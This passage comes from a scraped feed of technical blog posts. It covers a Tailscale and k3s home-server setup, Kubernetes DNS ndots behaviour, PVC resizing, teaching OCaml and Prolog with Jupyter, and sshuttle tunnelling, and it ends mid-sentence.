from PiHole to Adguard DNS, upstreaming to Unbound.\nContainerised all workloads and deployed them on K8s (using the k3s platform).\nThe setup looks something like this now:\n\nLet’s take a quick look at some of the above things in detail!\nUsing Tailscale#\nSo, before we jump to why I started using Tailscale, let’s address a few things about Wireguard which bothered me.\nAdding new devices is a real PITA, and quite often laziness kicks in when it’s time to generate a QR code or private\u002Fpublic key pair. 
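\nAs an aside, there’s no magic in those keys: a WireGuard keypair is just a raw X25519 key, base64-encoded. You’d normally generate one with wg genkey | wg pubkey, but a rough Python equivalent (using the pyca\u002Fcryptography package) looks like this:\nimport base64\n\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey\n\n# WireGuard keys are raw 32-byte X25519 keys, base64-encoded.\nprivate_key = X25519PrivateKey.generate()\nprivate_b64 = base64.b64encode(\n    private_key.private_bytes(\n        serialization.Encoding.Raw,\n        serialization.PrivateFormat.Raw,\n        serialization.NoEncryption(),\n    )\n).decode()\npublic_b64 = base64.b64encode(\n    private_key.public_key().public_bytes(\n        serialization.Encoding.Raw,\n        serialization.PublicFormat.Raw,\n    )\n).decode()\n\nprint(\"PrivateKey =\", private_b64)  # goes in your [Interface] section\nprint(\"PublicKey  =\", public_b64)   # shared with peers\n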
So, for those of you unaware, Wireguard needs a client config with the server endpoint and its public key for the client to communicate with the server. You need to add the client’s public key on the server side as well for the exchange of encrypted packets to happen. Doing all of this manually has been one of the reasons I’ve not added\u002Fupdated my devices as regularly as I’d like to. For example, on my recently bought iPad, I just haven’t bothered to do all of this, cause ugh, I am lazy?\nHaving a central VPN server to talk to my RPi from my local network just doesn’t seem right, you know? Especially when both devices are literally lying in the same room, sending the packets to a server somewhere in Electronic City (DO, blr region) from JP Nagar (where I live) feels totally unnecessary. I really needed a mesh network to reduce wasted bandwidth and latencies. Having a central VPN server is also a SPOF; not that my home server runs any mission-critical workloads, but it’s still good to avoid one where we can. Where else can I flex my ops chops if not on my home server, eh?\nI started looking at different mesh VPN setups and Tailscale attracted me the most. I heard about Tailscale for the first time when I saw bradfitz’s post about leaving Google and joining Tailscale on HN. Interestingly, Tailscale is built on top of wireguard-go (the userspace implementation of the Wireguard kernel module). Since I was already familiar with Wireguard and had been using it for almost a year, I got curious about Tailscale.\nTailscale basically sets up a point-to-point encrypted network across all your devices. What that means is there’s no “relay” (like a Wireguard server) and clients can talk to each other directly. While it may seem easy to set this up with a bunch of shell-scripting-foo (just add all Wireguard peers in each peer config), Tailscale does a lot of the heavy lifting by making the network seamless and handling authentication.\nCoordination Server#\nSo, when we add a new device to a Wireguard server, we basically need to generate a private\u002Fpublic key pair as explained above. When you’re setting up the Tailscale agent, it does all of this in the background and asks you to authorise against a central coordination server. Now, this server is only used to exchange information about each peer in your network. The Tailscale agent uploads the public key information of the peer you are currently on, and any time a new peer joins the network, all of the agents’ configurations are updated in real time. The coordination server periodically checks for any new changes and pushes the updates to the agent on each node.\nThe real juice is that they authenticate via OAuth, OIDC or SAML, which means that you can use your existing 2FA configurations to authenticate a new node in the network. This might be a point of concern for some users, but I chose convenience here. Also, since the traffic flows through the nodes directly and is encrypted, there’s not much to worry about here. I’ve been following Tailscale closely and they do plan to open-source the coordination server in the future, so maybe when that happens I’ll self-host it.\nNAT Traversal#\nApart from handling auth, Tailscale does a pretty good job at handling connectivity across different network topologies. So, basically, if you want to peer 2 devices over the public internet you need to perform NAT traversal. 
There are several NAT hole-punching techniques which allow traversing NATs, but since they are not standardised, and given sometimes-erratic NAT behaviour, doing this seamlessly poses quite a challenge. And I’m not even talking about roaming networks yet.\nTailscale agents can perform NAT traversal using ICE and STUN. What all of this practically means is that if you’re sitting in a cafe somewhere and you want to access any of your internal services, it is possible without messing around with any firewall ports :D\nTL;DR: I decided to give Tailscale a shot and was quite impressed by how easy it was to set up. You can refer to the official docs for more instructions, but I was able to set it up across 2 RPis and have them talk to each other in under 15 minutes. I think that’s quite an awesome feat in itself. The only sad bit is they don’t have an Android app yet, so I am eagerly waiting for it.\nHybrid K3s Cluster#\nSo, I am running a k3s cluster on my RPis. At the time, I was still using DO for running Pihole, Unbound, a public DNSCrypt resolver etc. I decided to standardise the ad-hoc deployments to manage them efficiently. It also allowed me to play around more with K8s, which was my original goal behind buying these Pis.\nNow, I’ve 2 RPi nodes; the k8s master node runs on the 4GB RPi while the 2GB variant serves as a worker node. I decided to get a bit fancy with my setup and hooked up the k3s agent installation script on a DO node and ta-da! I have a multi-arch (amd64 and arm64), hybrid (bare metal and cloud) K8s cluster ready! I think if I sprinkle some ML\u002FAI + Bitcoins on the above setup, I’m all set to raise VC funding for hydra.\nI wanted to learn Terraform as part of my work at my org as well, so I created + managed the entire droplet through Terraform. The script has modules to provision a droplet, attach an elastic IP, configure firewall rules and add my SSH key to the server. Quite easy to manage, and since I am generally a hater of GUIs, Terraform is indeed a blessing.\nI know some of my opinions are a bit strong, but don’t worry, I get meme’d\u002Fburnt for this almost every day by my work colleagues.\nPihole to Adguard#\nWhile Pihole works really well for blocking ads, it lacked some features, particularly DoT and DoH support out of the box. I decided to shift to Adguard as the codebase is in Go - something I am a bit familiar with - and the UI feels a bit sleek and refreshing too!\n\nAccessing internal services#\nA major challenge for me, however, was configuring access to internal services on the K8s cluster. Since I have bare metal worker nodes, it’s not possible to deploy a cloud load balancer. For now, I went with a really simple old-school solution: expose an Nginx proxy front-ending all my services through a NodePort. I am planning to look at Traefik or Istio for this, but I wanted to just shipit! at this point.\nHere’s a very basic example of an nginx config for ip.mrkaran.dev that I run on my cluster:\nserver {\n        server_name ip.mrkaran.dev;\n        # reverse proxy\n        location \u002F {\n                proxy_pass http:\u002F\u002F100.96.239.6:30506; # tailscale IP, connecting to NodePort service\n                include fluff\u002Fproxy.conf;\n        }\n}\nPort 30506 is exposed by the Service object backing the pods for that application. 
Since a NodePort service is available on any K8s node, you can give the Tailscale IP of any node and the routing will be handled by kube-proxy.\nChallenges faced#\nMesh or mess#\nSetting all of this up didn’t come without its own challenges. Right off the bat, the first problem was that I was seeing really high latencies from my RPi node to the DO node through Tailscale. Since both the nodes are physically in Bangalore and they connect to each other directly (or so I had presumed), I didn’t expect latencies as high as 500-600ms. Bollocks!\nEventually, I figured out that, thanks to my super restrictive rules on the firewall of the DO node, I had blocked all inbound UDP connections. That means NAT hole punching through STUN is simply not possible. In such cases, Tailscale forwards all packets to an encrypted TURN server (called DERP - Designated Encrypted Relay for Packets); these are basically encrypted TCP relays. Tailscale manages this network of DERPs, and the one I got connected to was somewhere in the USA.\nBottom line: I was all pumped up to talk to a DO node from my RPi node, but as it turns out (no pun intended) my packets were flowing through the USA! Ah, so bad. Anyway, opening up UDP from the Tailscale subnet fixed the issue and latencies were back to being sub-10ms. Yay!\nOverlay over an overlay#\nNext up were problems with k3s networking from the DO node to the RPi node. The DO node was in a NotReady state because the agent couldn’t reach the server:\nApr 14 09:00:33 hydra-control k3s[19746]: I0414 09:00:33.306650   19746 log.go:172] http: TLS handshake error from 100.97.222.106:51516: read tcp 100.96.239.6:6443->100.97.222.106:51516: read: connection reset by peer\nThrough some trial and error and reading the docs, I figured out that flannel runs as the CNI in k3s. Now, the problem is that flannel itself is an overlay network. But… Tailscale is already an overlay network (Wireguard), so the packets were not being routed correctly and were dropped halfway, in the master node (I am guessing the DNAT\u002FSNAT translation got botched up here).\nThe trick was to just change the flannel backend to run in the host namespace only. That solved the above issue for me.\nHowever, I still had one more issue. The DO node’s public IP was being advertised, while the agent was running on the Tailscale network interface, so the master was never able to reach the agent. Similarly, when the agent tried to communicate with the server, the private IP of the node was being advertised.\nSetting --node-external-ip \u003Ctailscale-ip> in the k3s config seemed to fix the problem.\nNow all of the nodes in the cluster had proper Tailscale IPs advertised, and the node went to Ready state at last!\nWho let the DNS out#\nSo, I have a chicken-and-egg problem in my setup. My laptop runs a Tailscale agent, and whenever I boot up my system, Tailscale attempts to post logs to log.tailscale.io and fails to start if it cannot. The problem here is: who resolves the DNS for me?\nI run a local DNS server with CoreDNS forwarding my queries to Adguard. Now if I can’t reach Adguard (since the Tailscale agent hasn’t initialised), how am I supposed to resolve log.tailscale.io? 
I did what any sane guy would do: write a simple hacky bash script:\n#!\u002Fbin\u002Fbash\n# Temporarily point DNS at 1.1.1.1 so the Tailscale agent can start,\n# then switch back to the local resolver.\nsudo chattr -i \u002Fetc\u002Fresolv.conf\n# `sudo echo ... > file` would redirect as the unprivileged user,\n# so pipe through `sudo tee` instead.\necho 'nameserver 1.1.1.1' | sudo tee \u002Fetc\u002Fresolv.conf\necho \"changed dns server to 1.1.1.1\"\nsudo tailscale up\necho 'nameserver 127.0.0.1' | sudo tee \u002Fetc\u002Fresolv.conf\necho \"changed dns server back to 127.0.0.1\"\nsudo chattr +i \u002Fetc\u002Fresolv.conf\nYes, it’s quite insane. Also, I’ve not been able to figure out how to stop NetworkManager from changing my \u002Fetc\u002Fresolv.conf, so I rely on a hack (documented in the official Arch docs) to lock the file so that no process can modify it. Quirky, but works!\nStorage#\nUnfortunately, I don’t have any external HDD\u002FSSD, so I am postponing running any stateful workloads till I get one soon (whenever the lockdown gets over in my area). I plan to deploy an NFS server so I can run stateful workloads across any node and have redundancy in the form of cloud backups. I’ve also heard cool things about Longhorn but unfortunately, it doesn’t have ARM support.\nFinal Thoughts#\nWell, I am quite stoked by my current setup. I learnt a bunch of cool things around NAT traversal and zero-trust networking, and realised the old days of LAN were so much better (not that I am old enough to have experienced them; my first internet connection was broadband at home, not even dial-up). Tailscale opens up a lot of new opportunities for corporate VPNs, and it is definitely something to watch out for as they continue improving the product.\nAlso, I was super elated when bradfitz himself commented on my tweet, not gonna lie!\nCredits#\nFirst, a major thanks to my friend sarat, with whom I pair-debugged a lot of the above issues; since he also runs a home server, he was my go-to person for doubts!\nHere are some links that I collected while setting all of this up, which might be useful as references if you’re planning a similar setup!\nHow Tailscale Works\nWhat are these 100.x.y.z addresses?\nk3s config reference\nP2P across NAT\nRemembering the LAN\nCloudskew (wonderful tool for creating architecture diagrams)\nIf you have any questions, please find me on Twitter @mrkaran. You can find all of the setup on GitHub.\nTill next time, if we survive the pandemic!",[],{"slug":2237,"title":2238,"link":2239,"pubDate":2240,"contentSnippet":2241,"tags":2242,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"change-font-in-telegram-desktop","How to change font in telegram desktop in Linux and Windows","https:\u002F\u002Fibcomputing.com\u002Fchange-font-in-telegram-desktop\u002F","Tue, 10 Mar 2020 08:59:38 +0000","Telegram Desktop is a wonderful application for accessing Telegram on a computer. This application is available for GNU\u002FLinux, Windows and Mac. But the main problem of … \nThe post How to change font in telegram desktop in Linux and Windows appeared first on IB Computing.",[2199,2200,12,2243],"Windows",{"slug":2245,"title":2246,"link":2247,"pubDate":2248,"contentSnippet":2249,"tags":2250,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"build-presentations-with-reveal-js-and-markdown","Create A Simple Presentation using Reveal js and Markdown","https:\u002F\u002Fibcomputing.com\u002Fbuild-presentations-with-reveal-js-and-markdown\u002F","Sat, 22 Feb 2020 06:13:44 +0000","Presentations are important for sharing something with others. 
We have office software such as LibreOffice Impress, Microsoft PowerPoint and Google Slides to do this … \nThe post Create A Simple Presentation using Reveal js and Markdown appeared first on IB Computing.",[2200,2251,2252,2253,2254],"Javascript","Markdown","Presentation","revealjs",{"slug":2256,"title":2257,"link":2258,"pubDate":2259,"contentSnippet":2260,"tags":2261,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"ndots-kubernetes","DNS Lookups in Kubernetes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fndots-kubernetes\u002F","2020-02-02T05:27:55.000Z","One of the primary advantages of deploying workloads in Kubernetes is seamless application discovery. Intra-cluster communication becomes easy with the concept of a Service, which represents a Virtual IP backing a set of Pod IPs. For example, if a vanilla service needs to talk to a chocolate service, it can directly use the Virtual IP for chocolate. Now the question is: who resolves the DNS query for chocolate, and how?\nDNS resolution is configured in a Kubernetes cluster through CoreDNS. The kubelet configures each Pod’s \u002Fetc\u002Fresolv.conf to use the CoreDNS service as the nameserver. The contents of \u002Fetc\u002Fresolv.conf inside any pod look something like:\nsearch hello.svc.cluster.local svc.cluster.local cluster.local\nnameserver 10.152.183.10\noptions ndots:5\nThis config is used by DNS clients to forward DNS queries to a DNS server. resolv.conf is the resolver configuration file, which has information about:\nnameserver: Where the DNS queries are forwarded to. In our case this is the address of the CoreDNS service.\nsearch: Represents the search path for a particular domain. Interestingly, google.com or mrkaran.dev is not an FQDN (fully qualified domain name). A standard convention that most DNS resolvers follow is that if a domain ends with . (representing the root zone), the domain is considered to be an FQDN. Some resolvers try to act smart and append the . themselves. So mrkaran.dev. is an FQDN but mrkaran.dev is not.\nndots: This is the most interesting value and is the highlight of this post. ndots represents the threshold number of dots in a query name for it to be considered a “fully qualified” domain name. More on this later, as we discover the flow of a DNS lookup.\n\nLet’s check what happens when we query for mrkaran.dev in a pod.\n$ nslookup mrkaran.dev\nServer: 10.152.183.10\nAddress: 10.152.183.10#53\n\nNon-authoritative answer:\nName: mrkaran.dev\nAddress: 157.230.35.153\nName: mrkaran.dev\nAddress: 2400:6180:0:d1::519:6001\nFor this experiment, I’ve also turned the CoreDNS logging level up to all, which makes it highly verbose. Let’s look at the logs of the coredns pod:\n[INFO] 10.1.28.1:35998 - 11131 \"A IN mrkaran.dev.hello.svc.cluster.local. udp 53 false 512\" NXDOMAIN qr,aa,rd 146 0.000263728s\n[INFO] 10.1.28.1:34040 - 36853 \"A IN mrkaran.dev.svc.cluster.local. udp 47 false 512\" NXDOMAIN qr,aa,rd 140 0.000214201s\n[INFO] 10.1.28.1:33468 - 29482 \"A IN mrkaran.dev.cluster.local. udp 43 false 512\" NXDOMAIN qr,aa,rd 136 0.000156107s\n[INFO] 10.1.28.1:58471 - 45814 \"A IN mrkaran.dev. udp 29 false 512\" NOERROR qr,rd,ra 56 0.110263459s\n[INFO] 10.1.28.1:54800 - 2463 \"AAAA IN mrkaran.dev. udp 29 false 512\" NOERROR qr,rd,ra 68 0.145091744s\nWhew. So 2 things piqued my interest here:\nThe query iterates through all the search paths until the answer contains a NOERROR code (which the DNS clients understand and store as the result). 
NXDOMAIN simply indicates that no record was found for that domain name. Since mrkaran.dev isn’t an FQDN (according to the ndots=5 setting), the resolver walks the search path to determine the order of queries.\nA and AAAA queries are fired in parallel. This is the glibc resolver’s default behaviour: it performs the IPv4 and IPv6 lookups concurrently. You can make it send them sequentially with the single-request option in \u002Fetc\u002Fresolv.conf.\nNote: glibc can be configured to send these requests sequentially but musl cannot, so Alpine users must take note.\nPlaying around with ndots#\nLet’s play around with ndots a bit more and see how it behaves. The idea is simple: the ndots setting is how the DNS client decides whether a name is an absolute domain or not. For example, if you query for just google, how will the DNS client know whether this is an absolute domain? If you set ndots to 1, the DNS client will say “oh, google doesn’t have even one dot, let me try going through the search list”. However, if you query for google.com, the search list will be completely ignored since the query name satisfies the ndots threshold (at least one dot).\nWe can see this by actually doing it:\n$ cat \u002Fetc\u002Fresolv.conf\noptions ndots:1\n$ nslookup mrkaran\nServer: 10.152.183.10\nAddress: 10.152.183.10#53\n\n** server can't find mrkaran: NXDOMAIN\nCoreDNS logs:\n[INFO] 10.1.28.1:52495 - 2606 "A IN mrkaran.hello.svc.cluster.local. udp 49 false 512" NXDOMAIN qr,aa,rd 142 0.000524939s\n[INFO] 10.1.28.1:59287 - 57522 "A IN mrkaran.svc.cluster.local. udp 43 false 512" NXDOMAIN qr,aa,rd 136 0.000368277s\n[INFO] 10.1.28.1:53086 - 4863 "A IN mrkaran.cluster.local. udp 39 false 512" NXDOMAIN qr,aa,rd 132 0.000355344s\n[INFO] 10.1.28.1:56863 - 41678 "A IN mrkaran. udp 25 false 512" NXDOMAIN qr,rd,ra 100 0.034629206s\nSince mrkaran didn’t contain any ., the search list was used to find the answer.\nNote: the ndots value is silently capped at 15, and defaults to 5 in Kubernetes.\nHandling this in Production#\nIf your application makes a lot of external network calls, DNS can become a bottleneck under heavy traffic, since a lot of extra queries are made before the real DNS query is even fired. It’s quite uncommon to see applications append the root zone to domain names, but it can be used as a hack: instead of using api.twitter.com, you can hardcode api.twitter.com. in your application, which forces DNS clients to do an authoritative lookup directly on the absolute domain.\nAlternatively, since K8s 1.14, the dnsConfig and dnsPolicy feature gates have become stable. So while deploying a pod you can set ndots to something lower, say 3, or, if you want to be really aggressive, turn it down to 1. The consequence is that every intra-cluster lookup now has to use the full domain name. This is one of the classic tradeoffs where you have to choose between performance and portability. If the app doesn’t demand super low latencies, I guess you need not worry about this at all, since DNS results are cached internally too.\nReferences#\nI first got to know about this peculiarity at a K8s meetup I went to last weekend, where folks mentioned having to deal with it.\nHere are some additional links you can read on the web:\nExplainer on why ndots=5 in kubernetes\nGreat read on how ndots affects application performance\nmusl and glibc resolver inconsistencies\nNote: I’m deliberately not using dig in this post. 
dig apparently automatically adds a . (root zone identifier) to make the domain an FQDN one without even first going through the search path. I’ve mentioned about this briefly in one of my older posts. Nonetheless, it’s quite surprising to see that you need to give a flag to make it behave in what seems to be a standard way.\nIt’s always DNS, isn’t it ;)#\nFin!\nUpdate#\n2020-12-24:\nIn case you want to play around with ndots and DNS more, I’ve worked on a DNS Client which lets you tweak these params on the fly. Feel free to checkout doggo if interested!",[],{"slug":2263,"title":2264,"link":2265,"pubDate":2266,"contentSnippet":2267,"tags":2268,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"ocaml-prolog-jupyter","Teaching OCaml and Prolog through Jupyter Notebooks","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fprolog\u002Fjupyter\u002Fnotebooks\u002F2020\u002F01\u002F19\u002FOCaml-Prolog-Jupyter\u002F","2020-01-19T15:16:00.000Z","Last semester at IIT Madras, I taught a revamped core course CS3100 Paradigms\nof Programming, which introduces 3rd-year\nstudents to functional and logic programming paradigms. While the course had\nbeen traditionally offered in Lisp and Prolog, I introduced OCaml instead of\nLisp. All of the lectures were delivered through interactive Jupyter\nnotebooks. The assignments were also distributed as Jupyter notebooks and\nevaluated through autograder facility in Jupyter. There has since been several\nrequests to replicate this setup elsewhere. Hence, I thought I should write\nabout the set up and experience of teaching through Jupyter notebooks.\nCourse Content\nHaving never taken a functional programming course, there was the question of\nwhat I wanted the students to take away from the course. I wanted the course to\nbe a mixture of functional programming concepts (types and lambda calculus) as\nwell as advanced yet pragmatic concepts that one would find in modern functional\nprogramming languages (such as GADTs and Monads). The OCaml part of the course\nis based on the excellent CS3110 from\nCornell and AFP from\nCambridge Computer Laboratory. In\nparticular, I would highly recommend the CS3110\nbook\nfor anyone taking first steps into functional programming. Lambda calculus\nlectures were based on Peter Selinger’s lecture notes on lambda\ncalculus.\nThe Prolog part of the course were modelled on Prolog lectures from Cambridge\nComputer Laboratory and the\nwonderful The Art of\nProlog book.\nTeaching functional and logic programming in the same course allowed me to\ndevelop interesting content that intersected both of the paradigms. In the\nfunctional programming part of the lecture, I had introduced simply typed\nlambda calculus. In the\nlogic part of the course, we developed a type checker for simply typed lambda\ncalculus in Prolog. Merely encoding type checking rules for simply typed lambda\ncalculus in Prolog, type inference with polymorphic types falls\nout. With a tiny bit of\ncoaxing, Prolog synthesizes programs for the given type. In the last assignment,\nthe students were asked to implement a Prolog interpreter in\nOCaml.\nThere was indeed some value in teaching multiple paradigms in the same course,\nnot just for a comparative study of strengths and weaknesses, but to be able to\nteach the students to pick the right tool for the job.\nCourse Delivery\nI had a clear idea that the course will have to be interactive where programs\nare developed during the lectures. 
There was the option of using pdf slides and\nswitching to utop for interactive\ndevelopment. But this solution lacked the uniformity that the students would\nlike when reviewing the course materials. Moreover, switching between two\nmediums made it difficult for me to plan the lectures and was a distraction for\nthe students.\nJupyter Notebooks\nHence, I decided to use Jupyter Notebooks for the course. Jupyter is a\ncollection of open source standards and software for interactive development.\nJupyter supports a variety of languages. For OCaml, I used\nakabe\u002Focaml-jupyter, an OCaml kernel\nfor Jupyter notebooks. This uses utop, an advanced OCaml top-level in the\nbackend and hence provides excellent interactive top-level support. The\nsituation for Prolog was not so great. Eventually, I zeroed in on\ntargodan\u002Fjupyter-swi-prolog\nbut ended up improving the solution a bit\nkayceesrk\u002Fjupyter-swi-prolog\n(TODO KC: upstream fixes). Jupyter supports mathjax,\nwhich allows typesetting LaTeX in the notebooks. This was great for writing the\nlectures on lambda calculus.\nRISE for slideshow\nJupyter notebooks are webpages that mixes text and code. For lectures, I much\nprefer slides since they let you focus on a particular images, statement or an\ninference rule. While Jupyter allows the conversion of notebooks to slides\nout-of-band, RISE is an Jupyter\nnotebook extension that lets turn your Jupyter notebook into a slideshow. Adding\nRISE to the setup makes the Jupyter experience compatible with traditional\nslides based lectures.\nCourse Distribution\nApart from delivering the lectures through the notebooks, I also wanted the\nstudents to be able to go through the notebooks and be able to run the snippets.\nInstalling all the required software (OPAM, OCaml, Prolog, Jupyter and its\nextensions, Jupyter Kernels for OCaml and Prolog) and correctly was not\nsomething I wanted the students to go through. I wasn’t even sure if this\nsoftware combination works on various Mac, Windows and Linux distributions.\nHence, everything was packaged as a Docker\nfile,\nand the latest version of the image uploaded to docker\nhub. In order to review the\ncourse, the students only had to install Docker and Git and run exactly 4\ncommands.\nDocker is generally supported on all major OSes. Packaging up the course content\nas a docker image and pushing it to dockerhub is insurance against the software\ncombination not working in the next offering of the course; if for some reason\none of the dependency does not work next year, I can always fallback to the\ndocker image while I find a fix. One of my TAs ran a tutorial on basic Docker\nand Git in the first week of the course to ensure that everyone was setup. I\nwould consider Docker and Git as essential tools for modern software development\nas well as research. After that, the students did not ever have to do anything\non the command line.\nAssignments\nnbgrader is a tool that\nfacilitates creating and grading assignments in Jupyter notebook. It uses\nlanguage-agnostic logic to identify failing cells, which meant that it was easy\nto set up nbgrader for OCaml and Prolog. The assignments were\nreleased as Jupyter notebooks,\nwhich the students filled in and submitted. nbgrader has support for unit tests\nwhich allowed the students to get instant feedback as they were developing the\nsolutions.\nWish List\nOverall, the students felt that the Jupyter notebooks were better than\nslidedecks. 
However, not everything was perfect with the Jupyter notebook based\nlecturing. Here are some of the things that could be improved.\nThere is no good diagramming + animation support for Jupyter notebooks. The\nbest I could find was egal whose user\ninterface I did not find intuitive. Even for simple diagrams, it was much more\neffort making diagrams there compared to Keynote, PowerPoint or OmniGraffle.\nEventually, I used draw.io to make the diagrams and\ninclude the images in the slides for a few of the cases where I actually\nneeded to make diagrams.\nDocker for Windows does not work on Windows Home or Student. Support for OPAM\non Windows is slowly improving, but it is not yet for novices. Hence, I had to\nrecommend the students to run an Ubuntu VM on their Windows machines in which\nthey ran the course’s docker container.\nnbgrader had several bugs which caused the autograder to award marks even for\nfailing cells. The TAs had to go through a few of the assignments manually to\nensure that students were awarded grades correctly. This is something that\nshould be fixable easily.\nRISE doesn’t easily let you change the size of the font. One has to edit the\nCSS to change the font size. And the default style wastes too much space. This\nmeant that not much content can be fit into a single slide. Hence, I’ve had to\nartificially split content into multiple slides or zoom out several steps to\nshow content that was cut off on the bottom.\nThe support for Prolog is not so great. There are a few advanced features in\nProlog for which the Prolog setup\nfails. I had to switch to\nSWI-Prolog top-level for a few lectures. That said, the Prolog support is\nmostly there and the issues can be fixed with some effort.\nConclusion\nI have started working on fixing some of these issues and upstreaming the\nsolutions. Hopefully the fixes should be ready for the next iteration of the\ncourse. If you would like to replicate this setup for your course, do feel free\nto utilise the course materials.",[],{"slug":2270,"title":2271,"link":2272,"pubDate":2273,"contentSnippet":2274,"tags":2275,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"resize-pvc-k8s","Resize PVC in Kubernetes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fresize-pvc-k8s\u002F","2020-01-14T02:40:55.000Z","Well, the title is self explanatory so let’s begin!\nFirst off, we need to ensure that the StorageClass which was used to provision the PVC has the correct configuration. From the official docs:\nYou can only expand a PVC if its storage class’s allowVolumeExpansion field is set to true.\nSo, let’s inspect our storage class:\n$ kubectl get sc # sc is short for storageclass\nNAME            PROVISIONER             AGE\ngp2 (default)   kubernetes.io\u002Faws-ebs   8d\n\n$ kubectl describe sc\u002Fgp2\n# output redacted to focus only on the field we're concerned with\nName:            gp2\nAllowVolumeExpansion:  True\nIf AllowVolumeExpansion is set to True you can skip the below step. 
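Aside: instead of hand-editing the full StorageClass manifest shown next, the same flip can be done with a one-line patch. A sketch, assuming the same gp2 StorageClass:

$ kubectl patch storageclass gp2 -p '{"allowVolumeExpansion": true}'
storageclass.storage.k8s.io/gp2 patched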
If it’s not true, you need to edit the allowVolumeExpansion field to true:\napiVersion: storage.k8s.io\u002Fv1\nkind: StorageClass\nmetadata:\n  annotations:\n    storageclass.kubernetes.io\u002Fis-default-class: "true"\n  name: gp2\nparameters:\n  fsType: ext4\n  type: gp2\nprovisioner: kubernetes.io\u002Faws-ebs\nreclaimPolicy: Delete\nvolumeBindingMode: WaitForFirstConsumer\nallowVolumeExpansion: true\nOnce the StorageClass config is correct, all we need to do is update the PVC with the new size.\nSo, for example, if the size of the PVC was originally 15Gi:\nspec:\n  resources:\n    requests:\n      storage: 15Gi\nTo update it to 30Gi, you simply need to edit the spec.resources.requests field:\nspec:\n  resources:\n    requests:\n      storage: 30Gi\nWe now need to “apply” the updated PVC manifest.\n$ kubectl apply -f pvc.yml\nLet’s take a look at the PVC:\n$ kubectl describe pvc\u002Fmyclaim\n# output redacted for brevity\n...\nConditions:\n  Type                      Status  LastProbeTime                     LastTransitionTime                Reason  Message\n  ----                      ------  -----------------                 ------------------                ------  -------\n  FileSystemResizePending   True    Mon, 01 Jan 0001 00:00:00 +0000   Tue, 14 Jan 2020 20:52:21 +0530           Waiting for user to (re-)start a pod to finish file system resize of volume on node.\n...\nSo, basically, what FileSystemResizePending means is that while the PVC is in use, we have to either restart or delete the underlying Pod using the PVC. At the time of writing this, ExpandInUsePersistentVolumes is still in beta and has to be enabled as a feature gate. Sadly, EKS is still on 1.14 (while the world has moved to 1.17, such sloooow release cycles!), so I couldn’t enable this in my case.\nOnce the pod is restarted, the expanded disk is automagically available! Let’s verify this:\nkc get pvc\u002Fmyclaim -o=jsonpath="{.status.capacity.storage}"\n30Gi\nNow, compare this with the standard way of resizing an EBS volume on an EC2 instance. You need to first modify the volume size using the AWS EBS API and then, on the EC2 instance, use a combination of growpart and resize2fs to extend the resized volume. That sounds much more cumbersome than simply updating the storage field in the PVC manifest!\nFin!",[],{"slug":2277,"title":2278,"link":2279,"pubDate":2280,"contentSnippet":2281,"tags":2282,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"using-sshuttle","sshuttle - A better ssh tunnel","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fusing-sshuttle\u002F","2020-01-12T04:27:55.000Z","The Motivation#\nSometime back I had to access a Kubernetes API server which was firewalled to a private VPC network. I didn’t want to set up a separate bastion instance just to access this cluster, cause TBH bastions are kinda redundant in K8s as every task can be performed through the client-server APIs using kubectl. So, all I needed was access to this API server from a trusted network in a secure way. Thanks to my friend @sarat, I got to know about sshuttle. sshuttle is quite unique in the sense that it’s not really a VPN but acts like one (for most practical purposes). sshuttle lets you access an internal network through a trusted node inside the VPC, without having to deal with the mess of port forwarding or VPNs.\nThe basic idea is pretty simple: sshuttle starts a local python server on your host machine and creates iptables rules to route packets destined for the specified CIDR blocks to this local server. 
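Since sshuttle owns those iptables rules, you can inspect them while it's running. A hedged sketch (the chain name embeds the local port, 12300 here; details vary across sshuttle versions and the iptables vs nft backends):

$ sudo iptables -t nat -nL sshuttle-12300
# expect REDIRECT entries, one per CIDR passed on the CLI,
# steering matching TCP traffic to the local python server on 127.0.0.1:12300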
Back at this local server, the packets are multiplexed over an ssh session and sent to the remote server. The remote end disassembles the multiplexed packets and routes them upstream. So, basically, this is a clever hack to avoid TCP-over-TCP (which is a mess on unreliable networks). Multiplexed streams over ssh ride on a single stateful TCP connection (as compared to VPN connections, which are stateless). Now you must be wondering: how does the target server disassemble the packets? Yes, there needs to be some kind of sshuttle daemon running which does that for you. This is where sshuttle does some magic: it automagically deploys a python script on your target host to perform this task. So yes, for sshuttle to work, the client needs iptables, and both the client and the target need python installed.\nUsage#\nsshuttle -r user@host x.x.x.x\nAll the packets routed to the CIDR block will now go through the sshuttle daemon, since it has configured iptables rules for them.\nAlso, sshuttle starts a local python server on your host machine. You can see it using netstat:\n$ sudo netstat -tunapl | grep python\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\u002FProgram name\ntcp        0      0 127.0.0.1:12300         0.0.0.0:*               LISTEN      27425\u002Fpython\nThere’s a python server listening on port 12300 on my host machine. To verify that this was indeed started by sshuttle, you can use pstree -p | less and search for sshuttle. Here you can see sshuttle did indeed start a python server, and the PID (27425) matches the one we saw in the netstat command.\n    -zsh(13201)---sshuttle(27425)-+-ssh(27446)---ssh(27447)\n                                    `-sudo(27427)---python(27445)\nYou can even forward DNS queries with the --dns flag. This is super helpful if you have something like Route53 hosting your DNS records on a private zone (e.g. a TLD like .internal).\nBetter than SSH tunnels?#\nYes, you can also port forward with ssh using:\nssh -nNT -L \u003Clocal-port>:{upstream-host}:{upstream-port} user@remote\nThe problem with ssh tunnels is that they experience frequent packet loss on a normal WiFi connection and it’s quite frustrating to deal with them. Moreover, sometimes you need access to multiple ports in your private network, which requires you to explicitly provide each one with the -L flag, which I find cumbersome. Also, you cannot forward DNS queries (over UDP) since ssh can only do TCP.\nsshuttle has made my life so 